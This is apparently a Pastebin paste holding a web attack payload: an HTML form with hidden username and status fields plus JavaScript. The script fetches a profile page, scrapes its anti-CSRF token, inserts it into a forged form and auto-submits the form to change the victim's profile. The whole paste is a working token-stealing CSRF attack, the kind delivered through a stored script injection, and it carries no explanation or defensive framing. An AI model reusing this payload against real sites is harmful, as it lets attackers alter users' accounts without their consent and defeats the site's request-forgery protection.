Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <form method='POST' action='?action=profile' enctype="multipart/form-data" id="csrf-form">
- <input type="hidden" name="username" value="user1234"/>
- <input type="hidden" name="status" value="on"/>
- <input type="hidden" id="forged-token" name="token" value=""/>
- <input type="submit" value="click me"/>
- </form>
- <script>
- var x = new XMLHttpRequest();
- function get() {
- x.open("GET","?action=profile",true);
- x.send(null);
- }
- x.onreadystatechange = function() {
- if (x.readyState == XMLHttpRequest.DONE && x.status === 200) {
- var el = document.createElement( 'html' );
- el.innerHTML = x.responseText;
- var list = el.getElementsByTagName("input");
- if (list.token.value != undefined)
- {
- document.getElementById("forged-token").value = list.token.value;
- document.getElementById("csrf-form").submit();
- }
- }
- }
- get();
- </script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement